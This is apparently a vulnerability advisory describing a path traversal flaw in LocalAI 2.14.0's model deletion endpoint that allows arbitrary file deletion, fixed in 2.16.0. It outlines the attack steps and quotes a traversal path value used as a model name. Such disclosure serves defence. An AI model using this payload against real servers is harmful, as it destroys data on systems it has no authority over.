Path Traversal Vulnerability in Model Deletion Process
A path traversal vulnerability was identified in LocalAI versions 2.14.0, allowing attackers to delete arbitrary files by exploiting the `model` parameter during the model deletion process. This issue was patched in version 2.16.0.
Available publicly on Jun 19 2024 | Available with Premium on Jun 03 2024
Threat Overview
The vulnerability arises from improper validation of user-supplied input in the model
parameter during the model deletion process. An attacker can craft a request that manipulates the file path to point to a file outside of the intended directory. This allows the attacker to delete files on the server, potentially leading to sensitive data loss or disruption of service.
Attack Scenario
An attacker first creates a malicious configuration file specifying a path traversal sequence (../../../../../../../../tmp/deleteme.txt
) as the model name. They then start a Python HTTP server to host this configuration. Using the LocalAI API, the attacker applies this configuration, causing the application to register the model. Finally, the attacker sends a request to delete the model, which results in the deletion of the specified file on the server.
Who is affected
Administrators and users of LocalAI version 2.14.0 are affected by this vulnerability. The risk is particularly high for systems where sensitive files are accessible by the LocalAI server process, as it allows attackers to delete arbitrary files.
Technical Report
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have - related security advisories that are available with Sightline Premium.